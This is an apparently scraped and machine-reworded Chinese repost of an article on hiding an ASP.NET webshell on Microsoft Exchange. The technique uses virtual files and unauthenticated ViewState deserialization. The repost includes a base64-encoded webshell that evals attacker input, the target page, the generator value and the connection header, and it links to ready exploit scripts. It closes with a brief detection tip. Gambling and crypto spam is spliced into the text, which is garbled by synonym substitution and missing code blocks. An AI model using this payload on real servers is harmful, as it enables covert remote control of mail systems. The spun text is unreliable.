皇冠体育寻求亚洲战略合作伙伴,皇冠代理招募中,皇冠平台开放会员注册、充值、提现、电脑版下载、APP下载。

首页科技正文

filecoin行情(www.ipfs8.vip):渗透技巧——行使虚拟文件隐藏ASP.NET Webshell

admin2021-05-1042技术

0x00 前言

通过ASP.NET的VirtualPathProvider类能够确立虚拟文件,实现以下效果:虚拟文件不存在于服务器的文件系统,然则能够对其动态编译并提供接见服务。ysoserial.net的GhostWebShell.cs提供了一种可供学习的行使思绪。

本文将要先容虚拟文件的行使方式,在ysoserial.net的GhostWebShell.cs基础上先容Exchange下的行使方式,开源代码,纪录细节,给出防御建议。

0x01 简介

本文将要先容以下内容:

· VirtualPathProvider在Exchange下的行使

· DotNet反序列化在Exchange下的行使

· 防御检测

0x02 VirtualPathProvider在Exchange下的行使

参考资料:

https://docs.microsoft.com/en-us/dotnet/api/system.web.hosting.virtualpathprovider?view=netframework-4.8

在实现上需要继续VirtualPathProvider类并重写两个方式:FileExists和GetFile,注册VirtualPathProvider并确立实例后,实现虚拟文件的确立

示例代码:

通过这种方式实现的Webshell,虽然能够隐藏真实的文件内容,然则需要依赖文件,容易被祛除,隐藏性不够。

而行使ysoserial.net的GhostWebShell.cs恰恰能够解决这个问题,提高隐藏性。

0x03 DotNet反序列化的行使

参考代码:

https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs

测试环境:

对于这两个位置的.Net反序列化下令执行,不再需要正当用户的凭证。

这里选择%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx,对应的generator为042A94E8

,

USDT交易所

U交所(www.payusdt.vip),全球頂尖的USDT場外擔保交易平臺。

,

使用ysoserial.net天生ViewState的参数如下:

使用如下代码发送ViewState:

一句话的测试代码:

使用AntSword毗邻时,需要设置HTTP HEADERS,内容如下:

Name:  Value
Value: 00HGAT3K0AXHV2RF2W0G

Base64后的字符为:

PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT48JQppZihSZXF1ZXN0LkhlYWRlcnNbIlZhbHVlIl09PSIwMEhHQVQzSzBBWEhWMlJGMlcwRyIpCnsKZXZhbChSZXF1ZXN0Lkl0ZW1bImFudHN3b3JkIl0sInVuc2FmZSIpOwkKfQplbHNlCnsKUmVzcG9uc2UuUmVkaXJlY3QoIi9vd2EvYXV0aC9lcnJvckZFLmFzcHg/aHR0cENvZGU9NDA0Iik7Cn0KJT4=

替换GhostWebShell.cs中的webshellContentsBase64。

完整的Python实现代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ghostfile.py

代码支持两个位置的反序列化执行,划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx,能够自动天生带有Webshell功效的GhostWebShell.cs,使用ysoserial.net天生ViewState并发送。

完整的C,实现代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-ghostfile.cs

代码功效同上,可直接编译并执行,不再依赖ysoserial.net

注:

为了便于在Exchange下举行测试,我将GhostWebShell.cs修改成了aspx文件,可以直接接见举行测试,代码地址如下:

https://github.com/3gstudent/test/blob/master/PageLoad_ghostfile.aspx

0x04 防御检测

行使虚拟文件确立的ASP.NET Webshell,不再需要写入aspx文件,在防御上可监控暂且目录下发生的编译文件,默认位置:

需要注重的是攻击者在发生编译文件后可以举行删除。

0x05 小结

本文先容了虚拟文件的行使方式,针对Exchange环境,划分先容了VirtualPathProvider和DotNet反序列化的行使,给出防御建议。

本文为 3gstudent 原创稿件,授权嘶吼独家公布,

Filecoin FLA

Filecoin FLA官网(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS官网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

网友评论